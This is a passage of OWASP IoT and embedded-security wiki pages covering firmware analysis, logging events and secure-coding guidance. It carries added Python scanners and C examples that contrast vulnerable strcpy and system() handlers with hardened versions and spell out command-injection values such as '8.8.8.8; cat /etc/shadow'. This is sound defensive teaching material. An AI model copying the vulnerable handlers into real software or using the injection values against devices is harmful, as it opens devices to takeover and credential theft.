{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Analysis Project ==<br />
<br />
The Firmware Analysis Project is intended to provide security testing guidance for the IoT Attack Surface "Device Firmware":<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Section<br />
! <br />
|- <br />
|<br />
Device Firmware Vulnerabilities<br />
|<br />
* Out-of-date core components<br />
* Unsupported core components<br />
* Expired and/or self-signed certificates<br />
* Same certificate used on multiple devices<br />
* Admin web interface concerns<br />
* Hardcoded or easy to guess credentials<br />
* Sensitive information disclosure<br />
* Sensitive URL disclosure<br />
* Encryption key exposure<br />
* Backdoor accounts<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
|-<br />
|<br />
Manufacturer Recommendations<br />
|<br />
* Ensure that supported and up-to-date software is used by developers<br />
* Ensure that robust update mechanisms are in place for devices<br />
* Ensure that certificates are not duplicated across devices and product lines.<br />
* Develop a mechanism to ensure a new certificate is installed when old ones expire<br />
* Disable deprecated SSL/TLS protocol versions<br />
* Ensure developers do not code in easy to guess or common admin passwords<br />
* Ensure services such as SSH have a secure password created<br />
* Develop a mechanism that requires the user to create a secure admin password during initial device setup<br />
* Ensure developers do not hard code passwords or hashes<br />
* Have source code reviewed by a third party before releasing device to production<br />
* Ensure industry standard encryption or strong hashing is used<br />
|-<br />
|<br />
Device Firmware Guidance and Instruction<br />
|<br />
* Firmware file analysis<br />
* Firmware extraction<br />
* Dynamic binary analysis<br />
* Static binary analysis<br />
* Static code analysis<br />
* Firmware emulation<br />
* File system analysis<br />
|-<br />
|<br />
Device Firmware Tools<br />
|<br />
* [https://github.com/craigz28/firmwalker Firmwalker] <br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://github.com/angr/angr Angr binary analysis framework]<br />
* [http://binwalk.org/ Binwalk firmware analysis tool]<br />
* [http://www.binaryanalysis.org/en/home Binary Analysis Tool]<br />
* [https://github.com/firmadyne/firmadyne Firmadyne]<br />
|-<br />
|<br />
Vulnerable Firmware<br />
|<br />
* [https://github.com/praetorian-inc/DVRF Damn Vulnerable Router Firmware]<br />
|-<br />
|}<br />
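Added example that serves both the "Firmware and storage extraction" row of the IoT Vulnerabilities table (what a dumped image gives up) and the Device Firmware Vulnerabilities list above; it is not the project's code and not one of the tools linked above. It walks an extracted root and flags private keys, the same certificate shipped in more than one place, weak or empty password hashes in shadow/passwd, hardcoded secrets in configuration files, and an out-of-date BusyBox banner. Point scan_rootfs at the squashfs-root that binwalk extracts; the tree built by build_sample_rootfs() is a constructed stand-in, and MIN_BUSYBOX, the regexes and the finding names are assumptions.<br />

```python
import hashlib
import os
import re
import tempfile

PRIVATE_KEY = re.compile(rb"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----")
CERT = re.compile(rb"-----BEGIN CERTIFICATE-----.*?-----END CERTIFICATE-----", re.S)
HARDCODED = re.compile(rb"(?im)^\s*(?:password|passwd|secret|api[_-]?key)\s*[=:]\s*\S+")
BUSYBOX = re.compile(rb"BusyBox v(\d+)\.(\d+)\.(\d+)")
MIN_BUSYBOX = (1, 30, 0)   # assumption: anything older is flagged for review


def weak_shadow_entries(data: bytes) -> list:
    """Accounts whose hash is DES crypt, MD5 crypt, or absent (empty password)."""
    out = []
    for line in data.splitlines():
        fields = line.split(b":")
        if len(fields) < 2:
            continue
        user, h = fields[0].decode(errors="replace"), fields[1]
        if h == b"":
            out.append((user, "empty password"))
        elif h in (b"*", b"!", b"!!", b"x"):
            continue                      # locked, or hash lives in /etc/shadow
        elif h.startswith(b"$1$"):
            out.append((user, "md5-crypt"))
        elif not h.startswith(b"$"):
            out.append((user, "des-crypt"))
    return out


def scan_rootfs(root: str) -> list:
    """Return sorted (finding, detail) pairs for every file under root."""
    findings, cert_seen = [], {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            try:
                with open(path, "rb") as f:
                    data = f.read()       # whole file; fine for a firmware root
            except OSError:
                continue
            if PRIVATE_KEY.search(data):
                findings.append(("private-key", rel))
            for cert in CERT.findall(data):
                digest = hashlib.sha256(cert).hexdigest()[:16]
                if digest in cert_seen:
                    findings.append(("duplicate-cert", f"{rel} == {cert_seen[digest]}"))
                else:
                    cert_seen[digest] = rel
            if rel.endswith(("etc/shadow", "etc/passwd")):
                for user, why in weak_shadow_entries(data):
                    findings.append(("weak-hash", f"{rel}:{user} ({why})"))
            elif HARDCODED.search(data):
                findings.append(("hardcoded-secret", rel))
            m = BUSYBOX.search(data)
            if m and tuple(int(g) for g in m.groups()) < MIN_BUSYBOX:
                findings.append(("outdated-busybox", f"{rel} v{b'.'.join(m.groups()).decode()}"))
    return sorted(findings)


def build_sample_rootfs() -> str:
    """Constructed fixture standing in for an extracted squashfs root."""
    root = tempfile.mkdtemp(prefix="rootfs-")
    cert = b"-----BEGIN CERTIFICATE-----\nMIIBsame\n-----END CERTIFICATE-----\n"
    files = {
        "etc/shadow": (b"root:$1$ab$hashhashhash:0:0:99999:7:::\n"
                       b"admin:abJnggxhB/yWI:0:0:99999:7:::\n"
                       b"nobody:*:0:0:::\nguest::0:0:::\n"),
        "etc/ssl/device.key": b"-----BEGIN RSA PRIVATE KEY-----\nMIIE...\n-----END RSA PRIVATE KEY-----\n",
        "etc/ssl/device.crt": cert,
        "usr/share/ca/backup.crt": cert,           # same cert shipped twice
        "etc/cloud.conf": b"endpoint=https://example.invalid\napi_key = sk_live_constructed\n",
        "bin/busybox": b"\x7fELF...BusyBox v1.22.1 (2016-01-01) multi-call binary\x00",
    }
    for rel, data in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as f:
            f.write(data)
    return root
```

The duplicate-certificate check is the one firmwalker-style greps miss: a key that is identical on every unit of a product line is a single extraction away from impersonating all of them, which is why the manufacturer recommendations above call for per-device certificates.<br />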
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Analysis Project? ==<br />
<br />
The Firmware Analysis Project provides:<br />
<br />
* Security testing guidance for vulnerabilities in the "Device Firmware" attack surface<br />
* Steps for extracting file systems from various firmware files<br />
* Guidance on searching a file system for sensitive or interesting data<br />
* Information on static analysis of firmware contents<br />
* Information on dynamic analysis of emulated services (e.g. web admin interface)<br />
* Testing tool links<br />
* A site for pulling together existing information on firmware analysis<br />
<br />
== Project Leaders ==<br />
<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Event Logging Project=<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File: OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Logging Events==<br />
<br />
This is a working draft of the recommended minimum IoT Device logging events. This includes many different types of devices, including consumer IoT, enterprise IoT, and ICS/SCADA type devices.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Event Category<br />
! Events<br />
|-<br />
| '''Request Exceptions'''<br />
|<br />
* Attempt to Invoke Unsupported HTTP Method<br />
* Unexpected Quantity of Characters in Parameter<br />
* Unexpected Type of Characters in Parameter<br />
|-<br />
| '''Authentication Exceptions'''<br />
|<br />
* Multiple Failed Passwords<br />
* High Rate of Login Attempts<br />
* Additional POST Variable<br />
* Deviation from Normal GEO Location<br />
|-<br />
| '''Session Exceptions'''<br />
|<br />
* Modifying the Existing Cookie<br />
* Substituting Another User's Valid SessionID or Cookie<br />
* Source Location Changes During Session<br />
|-<br />
| '''Access Control Exceptions'''<br />
|<br />
* Modifying URL Argument Within a GET for Direct Object Access Attempt<br />
* Modifying Parameter Within a POST for Direct Object Access Attempt<br />
* Forced Browsing Attempt<br />
|-<br />
| '''Ecosystem Membership Exceptions'''<br />
|<br />
* Traffic Seen from Disenrolled System<br />
* Traffic Seen from Unenrolled System<br />
* Failed Attempt to Enroll in Ecosystem<br />
* Multiple Attempts to Enroll in Ecosystem<br />
|-<br />
| '''Device Access Events'''<br />
|<br />
* Device Case Tampering Detected<br />
* Device Logic Board Tampering Detected<br />
|-<br />
| '''Administrative Mode Events'''<br />
|<br />
* Device Entered Administrative Mode<br />
* Device Accessed Using Default Administrative Credentials<br />
|-<br />
| '''Input Exceptions'''<br />
|<br />
* Double Encoded Character<br />
* Unexpected Encoding Used<br />
|-<br />
| '''Command Injection Exceptions'''<br />
|<br />
* Blacklist Inspection for Common SQL Injection Values<br />
* Abnormal Quantity of Returned Records<br />
|-<br />
| '''Honey Trap Exceptions'''<br />
|<br />
* Honey Trap Resource Requested<br />
* Honey Trap Data Used<br />
|-<br />
| '''Reputation Exceptions'''<br />
|<br />
* Suspicious or Disallowed User Source Location<br />
<br />
|-<br />
|}<br />
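Added example, not part of the project, showing the detection side of the table: a pass over raw device log lines that emits the event names listed above (Multiple Failed Passwords, High Rate of Login Attempts, Device Accessed Using Default Administrative Credentials, Source Location Changes During Session, Traffic Seen from Disenrolled System). The key=value log format, the thresholds, the default_cred flag and the sample lines in SAMPLE_LOG are all constructed assumptions.<br />

```python
import re
from collections import defaultdict
from datetime import datetime, timezone

# Constructed log format: ISO-8601 UTC timestamp followed by key=value pairs.
LINE = re.compile(r"^(?P<ts>\S+) (?P<kv>.*)$")
FAIL_THRESHOLD = 3      # Multiple Failed Passwords (assumption)
RATE_THRESHOLD = 5      # High Rate of Login Attempts ...
RATE_WINDOW_S = 60      # ... from one source within this window (assumption)

# Constructed sample: a brute-force run that ends in a default-credential login,
# the session then continuing from a different address, and a heartbeat from a
# device that was removed from the ecosystem.
SAMPLE_LOG = """\
2019-11-01T07:00:01Z dev=pump-17 src=10.0.0.5 user=admin event=login result=fail
2019-11-01T07:00:02Z dev=pump-17 src=10.0.0.5 user=admin event=login result=fail
2019-11-01T07:00:03Z dev=pump-17 src=10.0.0.5 user=admin event=login result=fail
2019-11-01T07:00:04Z dev=pump-17 src=10.0.0.5 user=admin event=login result=fail
2019-11-01T07:00:05Z dev=pump-17 src=10.0.0.5 user=admin event=login result=ok default_cred=yes session=s1
2019-11-01T07:00:30Z dev=pump-17 src=10.0.0.9 session=s1 event=request path=/config
2019-11-01T07:01:00Z dev=pump-17 src=10.0.0.77 event=heartbeat
""".splitlines()
DISENROLLED = frozenset({"10.0.0.77"})   # constructed: a device already deprovisioned


def parse(line: str) -> dict:
    m = LINE.match(line)
    rec = dict(kv.split("=", 1) for kv in m.group("kv").split())
    ts = datetime.strptime(m.group("ts"), "%Y-%m-%dT%H:%M:%SZ")
    rec["ts"] = ts.replace(tzinfo=timezone.utc).timestamp()
    return rec


def detect(lines, disenrolled=frozenset()) -> list:
    """Emit (event name, subject) pairs in the order the evidence completes."""
    events = []
    fails = defaultdict(int)        # consecutive failures per username
    attempts = defaultdict(list)    # login timestamps per source, pruned to the window
    session_src = {}                # first source seen for each session id
    for line in lines:
        r = parse(line)
        src, user, ts = r.get("src"), r.get("user"), r["ts"]
        if src in disenrolled:
            events.append(("Traffic Seen from Disenrolled System", src))
        if r.get("event") == "login":
            attempts[src] = [t for t in attempts[src] if ts - t <= RATE_WINDOW_S] + [ts]
            if len(attempts[src]) == RATE_THRESHOLD:
                events.append(("High Rate of Login Attempts", src))
            if r.get("result") == "fail":
                fails[user] += 1
                if fails[user] == FAIL_THRESHOLD:
                    events.append(("Multiple Failed Passwords", user))
            else:
                fails[user] = 0
                if r.get("default_cred") == "yes":
                    events.append(("Device Accessed Using Default Administrative Credentials", user))
        sid = r.get("session")
        if sid is not None and session_src.setdefault(sid, src) != src:
            events.append(("Source Location Changes During Session", sid))
    return events
```

Each event fires once when its evidence completes rather than on every subsequent line, which keeps a single brute-force run from flooding the collector; the raw lines still need to be retained, since the default-credential and disenrolled-device events only exist because the device itself recorded those facts.<br />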
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right: 25px;" valign="top" |<br />
<br />
== What is the IoT Security Logging Project? ==<br />
<br />
The IoT Security Logging Project provides a list of core events that should be logged in any IoT-related system. The project exists because IoT systems generally do not log nearly enough events to provide input for a solid detection and response program around IoT devices, and companies that want to build one have few good resources on what should be logged.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_AppSensor_Project The OWASP AppSensor Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= ICS/SCADA =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== ICS/SCADA Project ==<br />
<br />
The OWASP ICS/SCADA Top 10 software weaknesses are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Rank and ID<br />
! Title<br />
|- <br />
| '''1 - CWE-119'''<br />
|<br />
* Improper Restriction of Operations within the Bounds of a Memory Buffer<br />
|- <br />
| '''2 - CWE-20'''<br />
|<br />
* Improper Input Validation<br />
|- <br />
| '''3 - CWE-22'''<br />
|<br />
* Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')<br />
|-<br />
| '''4 - CWE-264'''<br />
|<br />
* Permissions, Privileges, and Access Controls<br />
|- <br />
| '''5 - CWE-200'''<br />
|<br />
* Information Exposure<br />
|- <br />
| '''6 - CWE-255'''<br />
|<br />
* Credentials Management<br />
|- <br />
| '''7 - CWE-287'''<br />
|<br />
* Improper Authentication<br />
|- <br />
| '''8 - CWE-399'''<br />
|<br />
* Resource Management Errors<br />
|- <br />
| '''9 - CWE-79'''<br />
|<br />
* Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')<br />
|- <br />
| '''10 - CWE-189'''<br />
|<br />
* Numeric Errors<br />
|- <br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the ICS/SCADA Project? ==<br />
<br />
The ICS/SCADA Project provides:<br />
<br />
* A list of the Top 10 most dangerous software weaknesses<br />
<br />
== Project Leaders ==<br />
<br />
* NJ Ouchn<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Community =<br />
<br />
[https://www.iamthecavalry.org/ I Am The Cavalry] <br />
<br />
A global grassroots organization that is focused on issues where computer security intersects public safety and human life.<br />
<br />
Their areas of focus include:<br />
* Medical devices<br />
* Automobiles<br />
* Home Electronics<br />
* Public Infrastructure<br />
<br />
[https://otalliance.org Online Trust Alliance]<br />
<br />
Formed as an informal industry working group in 2005, today OTA is an Internal Revenue Service (IRS) approved 501(c)(3) charitable organization with the mission to enhance online trust and empower users, while promoting innovation and the vitality of the internet. OTA is a global organization supported by over 100 organizations, headquartered in Bellevue, Washington, with offices in Washington DC.<br />
<br />
Addressing these mounting concerns, in January 2015 the Online Trust Alliance established the [https://otalliance.org/initiatives/internet-things IoT Trustworthy Working Group (ITWG)], a multi-stakeholder initiative. The group recognizes that "security and privacy by design" must be a priority from the onset of product development and be addressed holistically. The framework focuses on privacy, security and sustainability. The sustainability pillar is critical as it looks at the life-cycle issues related to long-term supportability and transfers of ownership of devices and the data collected.<br />
<br />
[https://allseenalliance.org/framework AllSeen Alliance]<br />
<br />
The AllSeen Alliance is a Linux Foundation collaborative project. They're a cross-industry consortium dedicated to enabling the interoperability of billions of devices, services and apps that comprise the Internet of Things. The Alliance supports the AllJoyn Framework, an open source software framework that makes it easy for devices and apps to discover and communicate with each other. Developers can write applications for interoperability regardless of transport layer, manufacturer, and without the need for Internet access. The software has been and will continue to be openly available for developers to download, and runs on popular platforms such as Linux and Linux-based Android, iOS, and Windows, including many other lightweight real-time operating systems.<br />
<br />
[http://www.iiconsortium.org/ The Industrial Internet Consortium (IIC)]<br />
<br />
The Industrial Internet Consortium is the open membership, international not-for-profit consortium that is setting the architectural framework and direction for the Industrial Internet. Founded by AT&T, Cisco, GE, IBM and Intel in March 2014, the consortium’s mission is to coordinate vast ecosystem initiatives to connect and integrate objects with people, processes and data using common architectures, interoperability and open standards.<br />
<br />
[http://securingsmartcities.org/ Securing Smart Cities]<br />
<br />
Securing Smart Cities is a not-for-profit global initiative that aims to solve the existing and future cybersecurity problems of smart cities through collaboration between companies, governments, media outlets, other not-for-profit initiatives and individuals across the world.<br />
<br />
===Talks===<br />
<br />
* RSA Conference San Francisco, April 21, 2015: [https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf Securing the Internet of Things: Mapping IoT Attack Surface Areas with the OWASP IoT Top 10 Project], Daniel Miessler, Practice Principal<br />
* DEF CON 23, August 6-9, 2015: [https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping], Daniel Miessler<br />
<br />
===Podcasts===<br />
<br />
* [http://iotpodcast.com/ The Internet of Things Podcast]<br />
* [http://www.iot-inc.com/ IoT Inc]<br />
* [https://craigsmith.net/iot-this-week/ IoT This Week]<br />
* [http://farstuff.com/ Farstuff: The Internet of Things Podcast]<br />
<br />
===IoT Conferences===<br />
<br />
* [http://www.iotevents.org Internet of Things Events]<br />
<br />
Conference Call for Papers<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=internet+of+things&year=t WikiCFP - Internet of Things]<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=iot&year=t WikiCFP - IoT]<br />
<br />
<br />
<br />
=Project About=<br />
<br />
{{Template:Project About<br />
| project_name =OWASP Internet of Things Project<br />
| project_description = <br />
| project_license =CC-BY 3.0 for documentation and GPLv3 for code. <br />
| leader_name1 = Daniel Miessler<br />
| leader_email1 = <br />
| leader_username1 = <br />
| leader_name2 =Craig Smith<br />
| leader_email2 = <br />
| leader_username2 = <br />
| contributor_name1 = Justin Klein Keane<br />
| contributor_email1 = <br />
| contributor_username1 = Justin_C._Klein_Keane<br />
| contributor_name2 = Yunsoul<br />
| contributor_email2 = <br />
| contributor_username2 = Yunsoul<br />
| mailing_list_name = <br />
| links_url1 = <br />
| links_name1 =<br />
}} <br />
<br />
<br />
<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]] <br />
[[Category:OWASP_Document]] <br />
[[Category:OWASP_Download]] <br />
[[Category:OWASP_Release_Quality_Document]]</div><br />
<br />
Aaron.guzman<br />
https://wiki.owasp.org/index.php?title=OWASP_Embedded_Application_Security&diff=245203<br />
OWASP Embedded Application Security<br />
2018-11-16T21:23:21Z<br />
<p>Aaron.guzman: /* Main */</p>
<hr />
<div>= Main = <br />
<div style="width:100%;height:100px;border:0,margin:0;overflow: hidden;">[[File:Incubator_big.jpg|link=OWASP_Project_Stages#tab=Incubator_Projects]]</div><br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
==OWASP Embedded Application Security Project ==<br />
<br />
The prevalence of embedded software within enterprise and consumer devices continues to rise every year. With the widespread publicity of the Internet of Things (IoT), more and more devices are becoming network connected, which makes secure coding guidelines for embedded software essential. Embedded application security is often not a high priority for developers producing devices such as routers, managed switches, medical devices, Industrial Control Systems (ICS), VoIP phones, IoT devices, and ATM kiosks, because of other challenges outside of development. Those challenges include, but are not limited to, the Original Design Manufacturer (ODM) supply chain, limited memory, a small stack, and pushing firmware updates securely to an endpoint. The goals of this project are to create a list of best practices, provide practical guidance to embedded developers, and draw on the existing OWASP resources that can bring application security expertise to the embedded world. It is important to note that each of the items and guidance points listed below is longstanding within software security: this document purely tailors issues on which OWASP has previously provided guidance (e.g. OWASP Top 10, Mobile Top 10, etc.) to the embedded community. ''Given the prevalence of Linux kernels in embedded devices, all code examples are geared towards a POSIX environment, but the principles are designed to be platform agnostic.''<br />
<br />
For the most up-to-date best practices document, please visit [https://scriptingxss.gitbooks.io/embedded-appsec-best-practices/ https://scriptingxss.gitbooks.io/embedded-appsec-best-practices/]<br />
<br />
| valign="top" style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== Mailing List / Group Communication ==<br />
<br />
[https://groups.google.com/a/owasp.org/forum/?hl=en#!forum/embedded-appsec Embedded Sec Mailing List]<br />
[http://owasp.herokuapp.com/ Please join our OWASP Slack channel; look for the #embeddedappsec]<br />
<br />
== Project Leaders ==<br />
<br />
[https://owasp.org/index.php/User:Aaron.guzman Aaron Guzman] [mailto:aaron.guzman@owasp.org @]<br />
<br><br />
[https://owasp.org/index.php/User:Alex.Lafrenz Alex Lafrenz] [mailto:alex.lafrenz@owasp.org @]<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP Internet of Things Project]]<br />
* [[C-Based Toolchain Hardening]]<br />
* [[OWASP Mobile Security Project]]<br />
* [[IoT Firmware Analysis]]<br />
<br />
| valign="top" style="padding-left:25px;width:200px;" |<br />
<br />
== News and Events ==<br />
== Releases ==<br />
[https://scriptingxss.gitbooks.io/top-10-embedded-appsec-best-practices/content/ Living Document (GitBook)] <br />
<br />
[https://www.gitbook.com/download/pdf/book/scriptingxss/top-10-embedded-appsec-best-practices Version 1 (2017)]<br />
<br />
Version 2 scheduled for Fall 2018<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" align="center" valign="top" width="50%" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| align="center" valign="top" width="50%" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| align="center" valign="top" width="50%" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= Embedded Best Practices =<br />
<br />
= Embedded Top 10 Best Practices =<br />
[https://scriptingxss.gitbooks.io/embedded-application-security-best-practices/content/ Click here to find additional details pertaining to each of the top ten categories listed below]<br />
== E1 – Buffer and Stack Overflow Protection ==<br />
Prevent the use of known dangerous functions and APIs in order to protect against memory-corruption vulnerabilities within firmware (e.g. the unsafe C functions gets, strcat, strcpy, sprintf, and scanf with an unbounded %s conversion). Memory-corruption vulnerabilities such as buffer overflows can consist of overflowing a buffer on the stack (stack overflow) or on the heap (heap overflow); for simplicity, this document does not distinguish between the two. When an attacker exploits a buffer overflow, the bytes written past the end of the buffer overwrite adjacent memory such as a saved return address, a function pointer or heap metadata, which in turn lets the attacker redirect the instruction pointer to code of their choosing. Use length-bounded alternatives (snprintf, strlcpy where available, width-limited scanf conversions) together with explicit length checks on every externally supplied value, and build with the toolchain protections (stack canaries, non-executable stack, ASLR, RELRO) covered by the related C-Based Toolchain Hardening project wherever the target platform supports them.<br />
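The following C example is added here to illustrate E1 and is not code from the OWASP project or the linked GitBook. It models a hypothetical configuration handler on an embedded Linux device that stores a network-supplied hostname in a fixed-size field: the vulnerable version uses strcpy and trusts the source length, while the hardened version bounds the scan with memchr, rejects over-long or malformed input outright instead of silently truncating, and only then copies. The struct layout, field names and HOSTNAME_MAX are assumptions made for the example.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Added example (not from the OWASP project): a configuration handler that
 * copies an attacker-controlled hostname into a fixed-size field.
 * The struct layout and size are hypothetical. */

#define HOSTNAME_MAX 32

struct device_config {
    char hostname[HOSTNAME_MAX];
    int  admin_enabled;   /* lies right after the buffer: an overflow clobbers it */
};

/* Vulnerable: strcpy() copies until the source's NUL, so a hostname of
 * HOSTNAME_MAX bytes or more runs past hostname[] into admin_enabled and,
 * for a stack-resident struct, eventually into the saved return address. */
void set_hostname_unsafe(struct device_config *cfg, const char *input)
{
    strcpy(cfg->hostname, input);
}

/* Hardened: measure the input without ever reading beyond HOSTNAME_MAX,
 * refuse anything that would not fit (truncation can change meaning) or
 * that contains characters a hostname must not have, then copy a length
 * we have already verified. Returns 0 on success, -1 if rejected. */
int set_hostname_safe(struct device_config *cfg, const char *input)
{
    const char *end = memchr(input, '\0', HOSTNAME_MAX); /* bounded scan */
    if (end == NULL)
        return -1;                        /* no NUL within the limit: too long */
    size_t len = (size_t)(end - input);
    if (len == 0)
        return -1;                        /* empty hostname is not valid */
    for (size_t i = 0; i < len; i++) {    /* RFC 1123 hostname characters only */
        char c = input[i];
        int ok = (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
                 (c >= '0' && c <= '9') || c == '-' || c == '.';
        if (!ok)
            return -1;
    }
    memcpy(cfg->hostname, input, len + 1); /* len < HOSTNAME_MAX, includes NUL */
    return 0;
}

int main(void)
{
    struct device_config cfg = { "", 0 };

    /* Constructed input: 40 'A's, longer than the 32-byte field. */
    char evil[41];
    memset(evil, 'A', 40);
    evil[40] = '\0';

    printf("safe, good input: %d\n", set_hostname_safe(&cfg, "sensor-01"));
    printf("safe, long input: %d (admin_enabled still %d)\n",
           set_hostname_safe(&cfg, evil), cfg.admin_enabled);
    /* set_hostname_unsafe(&cfg, evil) would overwrite admin_enabled with
     * 'AAAA' and keep writing past the struct; it is not called here. */
    return 0;
}
```

The rejection path matters as much as the copy: on a device with no interactive user, silently truncating "router.corp.example.com" to a shorter name changes which host the device trusts, so returning an error to the caller (and logging it) is the correct behaviour.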
== E2 – Injection Prevention ==<br />
Ensure all untrusted data and user input is validated, sanitized and/or output-encoded to prevent unintended command execution. Application security recognises many injection attacks, such as operating system (OS) command injection, cross-site scripting (e.g. JavaScript injection), SQL injection and XPath injection. The most prevalent injection attack in embedded software, however, is OS command injection: an application accepts untrusted input and passes it to an external program (either as the program name itself or as an argument) through a shell, without validation or proper escaping. Validate such input against an allow-list before use, and prefer executing helper programs directly with an argument vector (execve and its relatives) over shell-interpreted calls such as system() and popen(), so that shell metacharacters in the input have nothing to act on.<br />
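The following C example is added to illustrate E2; it is not code from the OWASP project. It models a hypothetical router diagnostics page that lets a user ping a host. The vulnerable version splices the host into a shell command line via system(), so a value like "8.8.8.8; cat /etc/shadow" runs a second command as the web server's user. The hardened version validates the target against an allow-list of hostname characters (which by construction excludes everything a shell interprets), refuses a leading '-' so the value cannot be parsed as a ping option, and then runs ping without a shell by passing the host as a single argv element to execvp. Replacing the shell with fork/execvp is a standard technique added here; the page itself only calls for validation or escaping. The function names are assumptions for the example.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Added example (not the project's code): a hypothetical diagnostics
 * handler that pings a user-supplied host. */

#define TARGET_MAX 254   /* longest hostname we are willing to accept */

/* Vulnerable: the host becomes part of a shell command line, so
 * "8.8.8.8; cat /etc/shadow" or "$(reboot)" is executed by /bin/sh. */
int ping_unsafe(const char *host)
{
    char cmd[512];
    snprintf(cmd, sizeof cmd, "ping -c 1 %s", host);
    return system(cmd);
}

/* Allow-list validation: only [A-Za-z0-9.-], non-empty, bounded length,
 * and not starting with '-' (ping would read it as an option).
 * Returns 1 if acceptable, 0 otherwise. Shell metacharacters
 * (; | & $ ` ( ) space newline) are rejected because they are not listed. */
int valid_ping_target(const char *host)
{
    const char *end = memchr(host, '\0', TARGET_MAX + 1); /* bounded scan */
    if (end == NULL)
        return 0;                                   /* too long */
    size_t len = (size_t)(end - host);
    if (len == 0 || host[0] == '-')
        return 0;
    for (size_t i = 0; i < len; i++) {
        char c = host[i];
        if (!((c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
              (c >= '0' && c <= '9') || c == '.' || c == '-'))
            return 0;
    }
    return 1;
}

/* Hardened: validate first, then execute ping directly with an argv,
 * never through a shell. Returns ping's exit status, or -1 on rejection
 * or failure. */
int ping_safe(const char *host)
{
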